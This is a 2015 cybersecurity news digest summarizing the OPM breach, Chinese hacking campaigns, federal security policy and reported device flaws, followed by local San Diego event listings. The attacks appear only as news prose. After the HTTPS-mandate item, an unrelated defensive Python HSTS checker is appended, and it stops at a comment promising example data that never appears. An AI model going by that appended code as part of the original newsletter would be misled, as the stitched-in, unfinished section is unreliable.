Welcome to Cyber News Tidbits 4U!

Here are updated news compilations from the Cyber Security Community

Topic headers (+++):

1 – Security news you can likely use (re: management / opportunity items)

2 – Other items of general FYI / FYSA level interest

3 – Threats / bad news stuff / etc.


4 – SD/SoCAL items of interest / opportunities (send me your SD meetings!)

A couple of Highlights (a couple of items of potentially notable interest / high utility & value… your mileage will vary…)

(Lots happening, so LOTs to be aware of. Takes 5 min to skim… then pick out a topic or two.)

(Some great topics / meetings here in SD… scroll to bottom and get engaged.)

June 24

Of course this is still news

+++ OPM hack – 4 – 19 million records exposed, SF86 too – for sale on Darknet.

“EPIC” fail – How OPM hackers tapped the mother lode of espionage data

Government officials have been vague in their testimony about the data breaches – there was apparently more than one – at the Office of Personnel Management. But on Thursday, officials from OPM, the Department of Homeland Security, and the Department of the Interior revealed new information that indicates at least two separate systems were compromised by attackers within OPM’s and Interior’s networks. The first was the Electronic Official Personnel Folder (eOPF) system, an entity hosted for OPM at the Department of the Interior’s shared service data center. The second was the central database behind EPIC, the suite of software used by OPM’s Federal Investigative Service in order to collect data for government employee and contractor background investigations.


+ Officials: Chinese had access to U.S. security clearance data for one year

The recently disclosed breach of the Office of Personnel Management’s security-clearance computer system took place a year ago, giving Chinese government intruders access to sensitive data for a year, according to new information. The considerable lag time between breach and discovery means that the adversary had more time to pull off a cyber-heist of consequence, said Stewart Baker, a former National Security Agency general counsel. “The longer you have to exfiltrate the data, the more you can take,” he said. “If you’ve got a year to map the network, to look at the file structures, to consult with experts and then go in and pack up stuff, you’re not going to miss the most valuable files.”

+++ OUR LinkedIn post on the top ten basic security tasks to DO for OPM / YOU = targeted cyber basics


+ Attack gave Chinese hackers privileged access to U.S. systems

For more than five years, American intelligence agencies followed several groups of Chinese hackers who were systematically draining information from defense contractors, energy firms and electronics makers, their targets shifting to fit Beijing’s latest economic priorities. But last summer, officials lost the trail as some of the hackers changed focus again, burrowing deep into United States government computer systems that contain vast troves of personnel data, according to American officials briefed on a federal investigation into the attack and private security experts.


+ Navy challenged by spear phishing, software patches

Of the myriad cybersecurity challenges facing the Navy, two stand out: spear phishing and more swiftly deploying software patches. That was the gist of a June 18 update on Navy defensive cyber operations given by Capt. David Bondura, U.S. Fleet Cyber Command’s assistant chief of staff for operations. Spear phishing, when hackers send malicious emails to a select group of people, is “our biggest problem right now,” Bondura said at an AFCEA conference in Baltimore. “Every single sailor on board any ship still poses a potential risk to that network” when they establish a secure socket layer (SSL) connection to an outside website by, for example, checking Facebook, Bondura said. “Once that SSL connection is established, we cannot see – that whole DOD architecture that’s built there – cannot see what’s coming down that encrypted pipe.”


+ Cyber warfare overshadows ‘netwar’ concept, putting US at risk

While many government officials are focused on cyberwarfare following a spate of high-profile cyberattacks including the recent Office of Personnel Management data breach allegedly by Chinese hackers, a new paper states that another concept called “netwar” – a psychological force that’s increasingly related to cyber – deserves more attention. The paper, released June 11 by the Office of the Director of National Intelligence, defines netwar as “intentional activities [meant] to influence the domain of human perception via either overt or hidden channels, in which one or more actors seeks to impose a desired change upon the perception of another actor, in order that this change facilitate second-and third order effects of benefit to them.”


+ ‘Digitization of everything’ will help enhance cybersecurity across government

The federal government’s top technology official / CIO said June 15 that “the digitization of everything” will help accelerate a new technological model that infuses cybersecurity as a core component. “This digitization is relentless and it won’t stop and it’s accelerating and it’s changing everything, including government,” Tony Scott, the federal chief information officer, told government employees during his keynote at the inaugural CIO Council IT Symposium in Washington, D.C. “We’re going to see more change in the next three or four or five years as the technology industry responds to today’s challenges and figures out new architectural models and paradigms for the future,” he added.


+ DISA five-year plan treats cyber as warring domain

The Defense Information Systems Agency has released a five-year strategy that calls on Defense Department personnel to treat cyberspace like a war-fighting domain by enabling maneuvering on DOD networks. “We will execute synchronized [DOD information network] command, operations and cyber defense missions to ensure freedom of maneuver for the war-fighter and mission partners,” the document states. “We’re waking up to realizing that there is a lot more that needs to be protected, there [are] a lot of better ways that we need to protect” DOD assets, said DISA Director Lt. Gen. Ronnie Hawkins.


+ Medical-device, IoT hacks spurring security software boom

The same hospital computer networks that have helped deliver medical devices to U.S. patients are now making them more vulnerable to cyberattacks. Malware intrusions are on the rise among such systems, says Greg Enriquez, CEO of TrapX, which tracks them as part of its effort to build software that tricks such evil code into revealing itself. This battle is growing, he says, because such data is often on older, more-vulnerable networks, while the financial incentives for stealing medical data increase.


+ Data breaches from nowhere – Most compromises still being discovered by third parties

The majority of data breaches are still being detected by sources outside the affected organisations, security firm Trustwave has reported in its annual report on the topic. Most victims took around three months to uncover incidents. Altogether, Trustwave investigated 574 breaches among its customer base during 2014. Although 15 countries were represented, the firm’s business orientation towards certain countries probably explains why half of those incidents were in the US, followed by Australia with 24 percent and the UK with 15 percent, although it is also possible that these countries are more heavily targeted.


+ Data warehouse raises privacy concerns

A government data warehouse that stores information indefinitely on millions of customers is raising privacy concerns at a time when major breaches have become distressingly common. Known as MIDAS, the system is described on a federal website as the “perpetual central repository” for information collected under President Barack Obama’s health care law. “Data in MIDAS is maintained indefinitely at this time,” says a government privacy assessment dated Jan. 15. The information stored includes names, Social Security numbers, birthdates, addresses, phone numbers, passport numbers, employment status and financial accounts.


+ Why China Wants Your Sensitive Data

Since May 2014, the Chinese government has been amassing a ‘Facebook for human intelligence.’ Here’s what it’s doing with the info…


+ The US Navy’s warfare systems command just paid millions to stay on Windows XP

Windows XP and other obsolete systems remain critical to the Navy’s operations…(they want to outdo OPM?)


+ Insider threat control: Using predictive and real-time analytics

According to a new security report, fewer than half of organizations have appropriate controls to prevent insider attacks. That would be the routine controls — the standard, basic stuff one would think every company uses and has used for years…


+ Why Is Fighting Cybercrime So Hard?

It’s tough to target the few hundred super hackers that experts believe are behind the majority of cyber attacks…


+ Pentagon May Hold IT Users More Accountable for Cyber Security

DOD CIO Terry Halvorsen said that there are few if any consequences for users whose online behavior creates security problems for DOD systems. Halvorsen said that the Pentagon plans to start holding IT users and their commanders more responsible for violating cyber security rules.


+ 2015 Data Protection Maturity Report


+ 2015 Annual Security report (and summary)


+ KREBS SAYS – Stop Worrying and Embrace the Security Freeze


+ Ten essential cyber security questions to ask your CISO


+ The Future Of Cybersecurity (Info sharing)


2 +++++++

+ US to raise breach of government records at talks with China

The United States began annual security talks with China on Monday, and an official said it plans to raise directly the breach of a federal government server that resulted in the theft of personnel and security clearance records of millions of employees and contractors. China has openly denied involvement in the break-in. Obama administration officials have said they are increasingly confident that China’s government, not criminal hackers, were responsible. U.S. and Chinese officials are discussing thorny issues including cybersecurity, maritime security, military relations, missile defense, nuclear policy and space security. The discussions, led by Deputy Secretary of State Antony Blinken and his Chinese counterpart, Executive Vice Foreign Minister Zhang Yesui, involve both civilian and military officials.


+ What’s worse: Living with legacy systems or replacing them?

The recent revelation of a breach at the Office of Personnel Management, which could have resulted in the theft of personal information of millions of government employees, also points up the broader problem government has with legacy systems — whether it’s worth spending the money to secure them. Not that securing the OPM’s systems would have done much good in this case — according to the Department of Homeland Security Assistant Secretary for Cybersecurity Andy Ozment, the systems were not directly penetrated. Instead, attackers obtained OPM users’ network credentials and got to the systems and data from the inside.


+ OPM hack: The role FISMA played

The Office of Personnel Management data breach is merely a symptom of a much larger problem across all federal government executive branch agencies, and it’s not going away anytime soon. That’s because the Federal Information Security Management Act, in all of its various forms over the past 14 years, has created a veritable disarray of legislative mandates, ostentatious oversight, ambiguous policy frameworks, ineffective guidelines, disjointed funding, and deficient accountability. Even more significant, FISMA botched cybersecurity leadership and governance across the entire executive branch.


+ Reacting to Chinese hack, the government did not follow its own cybersecurity rules

In responding to China’s massive hack of federal personnel data, the government may have run afoul of computer security again. Over the last nine days, the Office of Personnel Management has sent e-mail notices to hundreds of thousands of federal employees to notify them of the breach and recommend that they click on a link to a private contractor’s Web site to sign up for credit monitoring and other protections. But those e-mails have been met with increasing alarm by employees – along with retirees and former employees with personal data at risk – who worry that the communications may be a form of “spear phishing” used by adversaries to penetrate sensitive government computer systems.


+ Valuing cybersecurity outcomes instead of oversight

Every day, new technologies and applications offer opportunities to change how we work, live and play. This frenetic pace is rivaled only by the ever increasing number and sophistication of the cybersecurity threats we face. We are eager to embrace the future: the Internet of Things, nanotechnology and everything from Fitbits to bring your own device. We want to be always connected, from any device, from anywhere. Yet with each new capability that we embrace, new threats and vulnerabilities are introduced.


+ Study: 15-30 percent of eCommerce site visitors infected with CSIM

Infected with client-side injected malware (CSIM), according to a whitepaper from Namogoo, an online security firm that monitors numerous verticals throughout the U.S. and Europe. Although legally the company can’t identify the sites it monitors, Namogoo said they are among some of the most popular travel sites. “We didn’t expect to see such an increase in the infection rate in such a short time. We were surprised about the scale of the problem and also about the variety of different types of client-side Injected Malware,” Namogoo co-founder and CEO Chemi Katz said in an email.


+ Push for facial recognition privacy standards hits roadblock

Retailers have the ability to scan your face digitally and use that identification to offer you special prices or even recognize you as a prior shoplifter. But should they use it? Should they get your permission first? Privacy advocates announced Tuesday that they had walked away from government-mediated talks with industry that were intended to answer such questions. The idea was to hash out voluntary protocols for the use of facial recognition technology in a way that would not hurt consumers. The Commerce Department’s National Telecommunications and Information Administration, or NTIA, was acting as mediator.


+ Here’s what OPM told Congress the LAST TIME hackers breached its networks

A day after representatives from a security firm who happened to be giving a sales pitch say they detected months-old malware on the Office of Personnel Management’s networks, the agency’s chief information officer, Donna Seymour, testified before Congress that OPM’s leadership and cyber defenses were effective at quickly resolving threats. The newly discovered network threat, which Seymour did not mention to lawmakers, ultimately exposed sensitive data on 4.1 million federal workers and background-check forms detailing employees with access to classified information.


+ Emoji passwords could be coming your way. Is that a good thing?

Soon, you might be able to log into your bank account with a litany of smiling poo emojis, or a string of little chicken wing images, or multiple little monkeys holding their hands over their eyes. On Monday, a UK online banking service provider called Intelligent Environments announced what they’re calling the “world’s first emoji-only passcode.” Intelligent Environments says the emoji passcode system will allow users to use codes from a bank of 44 emojis — and don’t worry, it includes that lady in the red dress salsa dancing.


+ Put up the firewalls

When it comes to Chinese hacking, Americans cannot say they were not warned. In January James Clapper, the director of national intelligence, told a technology conference in New York that “China has been robbing our industrial base blind, largely with vulnerabilities that are easy to guard against or to simply fix.” They are, he said, “cleaning us out, because we know we’re supposed to do those simple things, and yet we don’t do them.”


+ Only Seven Percent of Malicious Mobile Applications Apparent to Users

Data from ESET on malicious mobile applications shows that only seven percent of reported incidents on mobile applications are caused by straightforward malware…


+ The Dark Web: An Untapped Source For Threat Intelligence

Most organizations already have the tools for starting a low-cost, high-return Dark Web cyber intelligence program within their existing IT and cybersecurity teams. Here’s how…


+ Lessons from the Sony Hack: The Importance of a Data Breach Response Plan

In a decision emphasizing the need for employers to focus on data security,


+ All industries fail cybersecurity, govt the worst

Most sectors failed industry-standard security tests of their Web and mobile applications, but the government failed the worst, a report by application security company Veracode found…


+ Case Study: Critical Controls that Sony Should Have Implemented

On November 24, 2014, an incident that seemed pulled straight out of a ’90s hacker movie turned into a massive computer hack. A group calling itself The Guardians of Peace (GOP) managed to breach Sony Pictures Entertainment


+ National Cyber Security Hall of Fame 2015 Nominations

Mike Jacobs, chair of the Cyber Security Institute of San Diego, is chair of the NCS HoFame. Mike was the first Information Assurance Director at NSA. We have had three years of inductees into the NCS HoFame that include many of the significant contributors to Cyber Security, including Rivest, Shamir, Adleman, Diffie, Hellman, etc.

There are five contribution categories for nominations: Technology, Policy, Public Awareness, Education and Business… Soliciting publicity for nominations, which are due July 5, 2015.


3 +++++++

+ Hunt for Deep Panda intensifies in trenches of U.S.-China cyberwar

Security researchers have many names for the hacking group that is one of the suspects for the cyberattack on the U.S. government’s Office of Personnel Management: PinkPanther, KungFu Kittens, Group 72 and, most famously, Deep Panda. But to Jared Myers and colleagues at cybersecurity company RSA, it is called Shell Crew, and Myers’ team is one of the few who has watched it mid-assault – and eventually repulsed it. Myers’ account of a months-long battle with the group illustrates the challenges governments and companies face in defending against hackers that researchers believe are linked to the Chinese government – a charge Beijing denies.


+ New exploit turns Samsung Galaxy phones into remote bugging devices

As many as 600 million Samsung phones may be vulnerable to attacks that allow hackers to surreptitiously monitor the camera and microphone, read incoming and outgoing text messages, and install malicious apps, a security researcher said. The vulnerability is in the update mechanism for a Samsung-customized version of SwiftKey, available on the Samsung Galaxy S6, S5, and several other Galaxy models. When downloading updates, the Samsung devices don’t encrypt the executable file, making it possible for attackers in a position to modify upstream traffic – such as those on the same Wi-Fi network – to replace the legitimate file with a malicious payload. The exploit was demonstrated Tuesday at the Black Hat security conference in London by Ryan Welton, a researcher with security firm NowSecure.


+ Major Mac flaw spills your passwords

Apple claims that its “Keychain” software lets people securely store their passwords on their Macs. As it turns out, hackers can pull the keys off the chain. A crucial flaw found in Macs allows a malicious app to snatch the passwords from your Keychain — or even directly from other apps. That exposes the passwords to your iCloud account, notes, photos, email, banking, social media — everything. Indiana University computer science professor XiaoFeng Wang and his team of researchers found several ways a bad app could “cross over” into other apps. The researchers found that malicious software could slip into the Apple Keychain, delete old passwords, and wait for you to retype them in. When you do, it grabs them.


+ Hack of cloud-based LastPass exposes hashed master passwords

LastPass officials warned Monday that attackers have compromised servers that run the company’s password management service and made off with cryptographically protected passwords and other sensitive user data. It was the second breach notification regarding the service in the past four years. In all, the unknown attackers obtained hashed user passwords, cryptographic salts, password reminders, and e-mail addresses, LastPass CEO Joe Siegrist wrote in a blog post. The post emphasized that there was no evidence the attackers were able to open cryptographically locked user vaults where plain-text passwords are stored. That’s because the master passwords that unlock those vaults were protected using an extremely slow hashing mechanism that requires large amounts of computing power to work.


+ 44.5 million new malware variants recorded in 1 month

A freshly released report from Symantec about the state of malware risks identified in the month of May informs that cybercriminals were highly active, creating no less than 44.5 million new versions of threats. The figure sets a new high this year and it represents an increase of more than 50% compared to the previous month, when the company’s system recorded 29.2 million new threats. The time interval with the second largest number of malicious software seen by Symantec systems is March, the total amount reaching 35.8 million samples.


+ China and Russia almost definitely have the Snowden docs

Last weekend, the Sunday Times published a front-page story, citing anonymous British sources claiming that both China and Russia have copies of the Snowden documents. It’s a terrible article, filled with factual inaccuracies and unsubstantiated claims about both Snowden’s actions and the damage caused by his disclosure, and others have thoroughly refuted the story. I want to focus on the actual question: Do countries like China and Russia have copies of the Snowden documents? I believe the answer is certainly yes, but that it’s almost certainly not Snowden’s fault.


+ Polish LOT airplanes grounded by computer hack

Some flights operated by Poland’s national airline, LOT, were grounded on Sunday after hackers attacked its computer system. The hacking attack targeted computers issuing flight plans at Warsaw’s Okecie airport. More than 1,400 passengers were affected, with 10 flights cancelled and another 12 delayed. Services were getting back to normal on Sunday evening. The attack is now being investigated by airline authorities. Flights to Dusseldorf, Hamburg and Copenhagen and Polish cities were affected, although LOT stressed that the glitch did not affect the airport or airplanes that were already in the air.

– Vulnerable Flight Plan Protocol Widely Used

The flight plan delivery protocol is used by virtually every airline. It does not require authentication. Earlier this month, United Airlines flights in the US were grounded for an hour; the airline did not offer many details, but the issue was reportedly with incorrect flight plans being sent to pilots.


+ Stegoloader malware hides in images on legit sites

Security researchers have warned that a little-known malware family could spell a new trend emerging in the ongoing cybersecurity arms race: the use of digital steganography to hide malicious code. Dell SecureWorks revealed its findings in a new report, Stegoloader: A Stealthy Information Stealer. It details a malware family first identified in 2013, although little discussed in the white hat community. The malware has been architected with several key features designed to make analysis and detection incredibly difficult – key among these being that it only deploys the modules it needs one by one, limiting exposure to investigators.


+ Even with a VPN, open Wi-Fi exposes users

By now, any sentient IT person knows the perils of open Wi-Fi. Those free connections in cafes and hotels don’t encrypt network traffic, so others on the network can read your traffic and possibly hijack your sessions. But one of the main solutions to this problem has a hole in it that isn’t widely appreciated. Large sites like Twitter and Google have adopted SSL broadly in order to protect users on such networks. But for broader protection, many people use a virtual private network (VPN). Most people, if they use a VPN at all, use a corporate one. But there are public services as well, such as F-Secure’s Freedome and Privax’s HideMyAss. Your device connects with the VPN service’s servers and establishes an encrypted tunnel for all your Internet traffic from the device to their servers. The service then proxies all your traffic to and from its destination.


+ Samsung and LG smartwatches leave sensitive data open to hackers

Hackers can easily swipe personal data from LG and Samsung smartwatches, researchers have revealed, with neither brand encrypting sensitive data. According to researchers at the University of New Haven, hackers can easily extract personal data, including contacts, messages and health information, from both the Samsung Gear 2 and LG G Watch. Ibrahim Baggili of the University of New Haven’s Cyber Forensics Research and Education Group, said: “It was not very difficult to get the data, but expertise and research was required.” The researchers, who are currently looking into whether the Apple Watch suffers a similar issue, said they were able to easily swipe data from both the Tizen and Android Wear-powered watches by poking around the wearables’ internal storage and the smartphone to which they were linked.


+ Chinese hackers circumvent popular web privacy tools

a way around widely used privacy technology to target the creators and readers of web content that state censors have deemed hostile, according to new research. The hackers were able to circumvent two of the most trusted privacy tools on the Internet: virtual private networks, or VPNs, and Tor, the anonymity software that masks a computer’s true whereabouts by routing its Internet connection through various points around the globe, according to findings by Jaime Blasco, a security researcher at AlienVault, a Silicon Valley security company.


+ Criminals Continue to Defraud and Extort Funds from Victims Using Cryptowall Ransomware Schemes

Data from the FBI’s Internet Crime Complaint Center (IC3) shows ransomware continues to spread and is infecting devices around the globe…


+ Just How Dark Is The ‘Deep Web’?

A new report has attempted to shed some light on the kinds of illegal and immoral activities carried out on the deep web, an area off limits to the majority of Internet users…


+ US Hosts The Most Botnet Servers

More malicious command and control servers are based in the US than anywhere else, and China is home to the most bots.


+ Verizon, AT&T, WhatsApp rank low in data privacy report


+++  SD/SoCAL security events / opportunities +++

+ CyberTECH events / networking / startups / etc — THE cyber happening place in SD!!!

Join their Meetup Group for the latest event information! The definition of “Cyber KEWEL”.


25 – ISSA – (11:30AM) – “HealthCare CISO panel” (at ADM Baker field clubhouse)


9 – SD ISC2 (Thur at 6PM) – “SD CityCISO – 2 years and counting – lessons learned” – Gary Hayslip

Location – BAH (Suite 200), 4055 Hancock Street, San Diego, CA 92110 USA

16 – OWASP – 6PM – Peter Bartoli is the VP of Operations at M5 Hosting and an adjunct professor at San Diego State University in the Computer


Global Cyber events:


June 15 (TWO weeks’ worth again…)

1 +++++++

Of course this is still news

+++ OPM hack – 4 – 19 million records exposed, already for sale on Darknet.

Union: Hackers have personnel data on every federal employee

Hackers stole personnel data and Social Security numbers for every federal employee, a government worker union said Thursday, asserting that the cyber theft of U.S. employee information was more damaging than the Obama administration has acknowledged. … the December hack into Office of Personnel Management data was carried out by “the Chinese”.

And a DHS spokesperson told Ars that “interagency partners” were helping the OPM improve its network monitoring “through which OPM detected new malicious activity affecting its information technology systems and data in April 2015.” Those statements may not be entirely accurate… A product demo looks to have found the hack…

China hackers got past costly U.S. computer security with ease

The hackers sneaked past a sophisticated counter-hacking system called Einstein 3, a highly-touted, multimillion-dollar and mostly secret technology that’s been years in the making. It’s also, by the government’s own admission, already obsolete.

AND this…

White House orders government to do four basic security items (and one was NOT encryption???)


+++ OUR LinkedIn post on the top ten basic security tasks to DO for OPM / YOU = targeted cyber basics



+ When regulating apps, smart cities need to be smart about privacy

Cities across the country are using data to more effectively and efficiently provide services for citizens. New York City, under the last several mayors, has been at the forefront of analyzing information from across the city to tackle problems ranging from public safety to the environment. Smart cities bring together cutting-edge monitoring, big data analysis and innovative management technologies to the world of urban planning, but all of these data in government hands raise important privacy issues. Basic caution is warranted with regards to law enforcement access and public release of this information, either through data breaches or Freedom of Information laws.



+ Government malware spied on cybersecurity company, possibly Iran nuclear talks

A successor to Stuxnet, the sophisticated piece of malware that infected Iran’s nuclear centrifuges around 2010, managed to infiltrate one of the most high-profile cybersecurity groups. Today, Kaspersky Labs published a postmortem on what it calls Duqu 2.0, a derivative of the Duqu program it investigated in 2011; Kaspersky has previously tied Duqu to Stuxnet. “The thinking behind it is a generation ahead of anything we’d seen earlier — it uses a number of tricks that make it really difficult to detect and neutralize,”



+ Here’s what you can do to secure your network as the Internet of Everything nears

The Internet of Everything, the intersection and connection of people, processes, data, and things, holds great promise for creating greater operational efficiencies within government entities. It has the potential to help with everything from traffic jams to safety in public parks. Cisco predicts that by the year 2020, 50 billion devices will be Internet connected. As government agencies continue to bring more and more devices from disparate suppliers into their network, cybersecurity models need to radically change.



+ Agencies spend big on cloud this year

Federal agencies are expected to spend at least $400 million more on cloud computing this year than last. The expected bump would bring the year’s total cloud computing spending to $2 billion and illustrates the heightened attention the federal government is paying to the cloud,



+ SpaceX founder files with government to provide Internet service from space

Elon Musk’s space company has asked the federal government for permission to begin testing on an ambitious project to beam Internet service from space, a significant step forward for an initiative that could create another major competitor to Comcast, AT&T and other telecom companies.



+ Sidewalk Labs, a start-up created by Google, has bold aims to improve city living

Now Google is getting into the ultimate manifestation of the messy real world: cities. The Silicon Valley giant is starting and funding an independent company dedicated to coming up with new technologies to improve urban life. The start-up, Sidewalk Labs, will be headed by Daniel L. Doctoroff, former deputy mayor of New York City for economic development and former chief executive of Bloomberg L.P.



+ Microsoft opens EU ‘Transparency Centre’ to allay fears over NSA backdoors

Microsoft has opened a Transparency Centre in Brussels, its second after launching the first in Redmond just under a year ago. According to the company, the new centre “offers participating governmental agencies the opportunity to review the source code of Microsoft products, access information on cybersecurity threats and vulnerabilities,



+ Wall Street watchdog sets rules for bitcoin

A top Wall Street watchdog on Wednesday issued new rules that place stricter cybersecurity requirements on financial firms wishing to use virtual currencies.  “Building trust and confidence among consumers is crucial for wider adoption. It also helps attract additional investment.”



+ NIST releases draft framework to help agencies understand, manage privacy issues

The National Institute of Standards and Technology last week released a draft guide aimed at helping federal agencies anticipate and address privacy risks from collecting and processing personal data through their computer networks. The draft, NIST Internal Report 8062, is called “Privacy Risk Management for Federal Information Systems.”



+ More bosses expected to track their staff through wearables in the next 5 years

Last year insurance company USAA banned its employees from wearing Google Glass to work. The problem wasn’t the geeky look they gave their staff, but the potential privacy risk they posed on other colleagues and customers.



+ Security Defenses Are No Match for Cyber-Crooks

Organizations are falling behind the security curve, and security defenses that were at least somewhat effective a decade ago no longer cut it… According to Privacy Rights Clearinghouse, 49 major public breaches representing 80,319,845 records have already taken place in 2015.



+ Why the Internet of Things isn’t the same as the new hardware movement

Cheap, accessible, open hardware is driving the IoT… So, hardware can be deployed in all sorts of ways that it couldn’t before, and at much lower cost. That means computing can extend into many places where it couldn’t before — like cornfields and streetlights.



+ Growing cyber threats challenging cost reduction as reason to use managed services

Mid-sized companies plan to use more managed services and many see it as improving security…



+ Raytheon Rethinks Cyber, Trademarks C5I Concept

The defense industry loves acronyms, but it’s rare that one given to a trade space is trademarked. Yet by adding “cyber” to the widely used C4I (command, control, communications, computers and intelligence), Raytheon has taken that step with C5I…



+ Companies Should Heed DOJ’s New Cybersecurity Guidance to Minimize Liability

The Department of Justice (DOJ) has released new guidance on cyber preparedness and incident response, becoming the latest federal agency to do so in recent months…



+ 20 Top Security Influencers

It can be tough to know where to go for the latest enterprise security news and actionable advice. This list of influencers is a great place to start…



+ Survival Tips For The Security Skills Shortage

No matter how you slice it, creating a security professional with 10 years of experience takes, well, 10 years. Here are six suggestions for doing more with less…



+ Duqu 2.0 Attack On Kaspersky Lab Opens Chilling New Chapter In Cyber Espionage

New nation-state campaign with previous ties to Stuxnet spies on security firm’s research and anti-cyber spying technologies — plus participants in Iranian nuclear negotiations and their telecommunications, mobile providers…



+ RAND study: Cyber-defense must change course, or else

RAND today released the results of its multiphased study on cybersecurity’s future, The Defender’s Dilemma, delivering a frightening snapshot of defenders lost at sea…  (162 pages of solid cyber sense…)



+ 8 Surprising Facts About the Rise of the Dark Net

One of the truly indispensable works of nonfiction released in 2015, Jamie Bartlett’s The Dark Net charts the rise of the anonymous Internet — the “dark net” — and its many appendages…



+ 10 highest-paying IT security jobs

High-profile security breaches, data loss and the need for companies to safeguard themselves against attacks is driving salaries for IT security specialists through the roof. Here are the 10 highest-paying security roles



+ Insider Threat Report 2015



+ Definitive Guide To Cloud Access Security Brokers (CASBs)  (requires browser plug-in)



+ SIEM guide



+ The Calm Before the Mobile API Data Breach Storm?



+ IEEE May/June Security and Privacy Magazine





2  +++++++



+ After OPM debacle, three-step biometric ID checks are coming

Expect computers to require that federal personnel use a smartcard, a password, and their fingerprints before logging on, as a way to shore up defenses in the wake of a massive government cyber assault, a top official at the Department of Homeland Security said this week. So-called three-factor authentication goes one step further than today’s government-wide sign-on routine, which involves only a badge and PIN, if that. Most agencies, including the recently hacked Office of Personnel Management, only require a PIN. Foreign spies, who allegedly extracted details on millions of current and former federal employees from OPM’s network, might change that.



+ Senate rejects measure to strengthen cybersecurity

On the heels of a vast breach of the personal information of federal employees, the Senate failed Thursday to advance a cybersecurity measure, the third time in three years that a bipartisan effort to tackle the problem has fallen victim to procedural actions. The measure, which failed, 40 to 56, was similar to an expansive bill passed by the House two months ago that would push companies to share access to their computer networks and records with federal investigators. Senator Mitch McConnell, Republican of Kentucky and the majority leader, attached the cybersecurity measure to a larger defense policy bill, hoping its complexity and broad bipartisan support would counter President Obama’s threat to veto that measure. Democrats objected to the move and voted against the cybersecurity measure as a result.



+ EU, US officials close in on broad privacy accords

After years of thorny negotiations, top EU and U.S. officials say they are close to agreement on two privacy accords that would regulate the transfer of personal data of European citizens to the U.S. At stake is the ability of U.S. and European companies and governments to share data about private citizens for commercial and law enforcement purposes. A version of one of the two privacy deals being discussed, the Safe Harbor accord, has been in force for years but is being renegotiated. Failure to reach agreement on how to change the accord would spell serious trouble for companies like Google, Facebook and Twitter, which have relied on it to transmit data on EU citizens to the U.S. for processing and storage.



+ Big data systems house sensitive data, security exposures

Big data systems are invading enterprise data centers at a rapid rate, but they often lack the controlled access, data encryption, and other protections inherent in relational systems, according to a SANS Institute survey of 206 companies. Of the respondents, 43% were from organizations with 10,000 or more employees and 53% held a title related to IT security. Big data systems increasingly serve as the repository for personal-identification information and corporate intellectual property. For example, the SANS survey found 73% of respondents with big data applications “use them to store personal data on customers and 72% store important business data,” such as employee records (64%), intellectual property (59%), and payment card information (53%).



+ FCC Open Internet rules are finally here. So what’s changed?

The Federal Communications Commission’s long-awaited rules to ensure Internet openness take effect today. Whether you’re a casual Web user or a so-called “cord cutter” who’s ditched pay-TV service in favor of streaming sites like Netflix and Hulu, here’s how the regulations might affect you. Under the FCC rules, companies providing you a broadband Internet access service — whether it’s cable in your home or 4G on your phone — must treat all traffic traveling over the Web equally. They can’t block your lawful content or slow your connection to keep you from using particular services, apps or devices. They also can’t favor their own content ahead of others’ or create fast lanes for a fee.

+ Funding bill would block net neutrality until courts rule

A House appropriations bill released Wednesday would block the Federal Communications Commission from implementing its net neutrality rules until the courts weigh in on the issue.



+ How did Estonia become a global leader in digital government?

Quick: think of the most digital-friendly government in the world. If Estonia’s didn’t immediately pop into your head, then listen up. The tiny European nation was the first country to permit online voting more than a decade ago, and it has consistently led the way in digital signatures and online transactions. But Estonia didn’t become a global leader of e-governance because the country is some sort of “digital Narnia,” says Andres Kutt, the architect and adviser to the Estonian Information Security Authority. The country’s tech transformation was born out of necessity, he says.



+ SANS whitepaper, based on its 2015 State of Application Security Survey

Read it to find out: the top security challenges faced by both the builders and defenders of software; how these challenges are made more complicated by the rapidly accelerating pace of development and the lack of control over applications hosted in the cloud; the progress, and the setbacks, in the effort to align developers and security professionals; and best-practice advice for secure development and delivery of applications throughout the software development lifecycle.



+ NASA and Verizon plan to monitor US drone network from phone towers

Verizon signed an agreement last year with NASA “to jointly explore whether cell towers … could support communications and surveillance of unmanned aerial systems (UAS) at low altitudes”. That $500,000 project is now underway at NASA’s Ames Research Center in the heart of Silicon Valley.



+ Building effective cybersecurity teams at all levels

Cybersecurity is becoming an increasingly common topic of conversation across the public sector, and for good reason.



+ The U.S. government is mandating the use of the HTTPS security protocol on all of its public websites and web services by the end of 2016

Deploying HTTPS will authenticate communications with government websites and encrypt the data sent back and forth, which will help protect against snooping and imposter websites.
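Whether a site actually meets the mandate is more than a certificate question: plain-HTTP requests must redirect to HTTPS rather than serve content, and the HTTPS response should set a long-lived HSTS policy so browsers stop making the insecure first request at all. The check below is an added example, not part of the mandate or of this newsletter; the responses, the fictional `agency.example` host and the one-year `max-age` threshold are constructed assumptions.

```python
"""HTTPS-posture check from captured responses (added example; data constructed)."""
from dataclasses import dataclass, field
from typing import Dict, List

ONE_YEAR = 31536000  # seconds; assumed minimum HSTS max-age for a "strong" policy
REDIRECTS = (301, 302, 307, 308)


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (constructed for this example)."""
    url: str
    status: int
    headers: Dict[str, str] = field(default_factory=dict)

    def header(self, name: str) -> str:
        """Case-insensitive header lookup; '' if absent."""
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return ""


def parse_hsts(value: str) -> Dict[str, object]:
    """Split a Strict-Transport-Security value into lower-cased directives.
    'max-age=31536000; includeSubDomains' -> {'max-age': '31536000', 'includesubdomains': True}"""
    directives: Dict[str, object] = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            name, val = part.split("=", 1)
            directives[name.strip().lower()] = val.strip().strip('"')
        else:
            directives[part.lower()] = True
    return directives


def check_https_posture(http_resp: Response, https_resp: Response) -> List[str]:
    """Return findings for one host; an empty list means the checks pass."""
    findings: List[str] = []

    # 1. The plain-HTTP endpoint must redirect to HTTPS rather than serve content.
    location = http_resp.header("Location")
    if http_resp.status not in REDIRECTS or not location.lower().startswith("https://"):
        findings.append("http endpoint does not redirect to https")

    # 2. The HTTPS response should pin the browser to HTTPS with a long-lived HSTS policy.
    hsts = https_resp.header("Strict-Transport-Security")
    if not hsts:
        findings.append("missing Strict-Transport-Security header")
    else:
        directives = parse_hsts(hsts)
        try:
            max_age = int(str(directives.get("max-age", "0")))
        except ValueError:
            max_age = 0  # a bare or malformed max-age counts as no policy
        if max_age < ONE_YEAR:
            findings.append(f"hsts max-age too short: {max_age}")
        if "includesubdomains" not in directives:
            findings.append("hsts lacks includeSubDomains")
    return findings


# Constructed responses for a fictional host (agency.example): a weak pair and a hardened pair.
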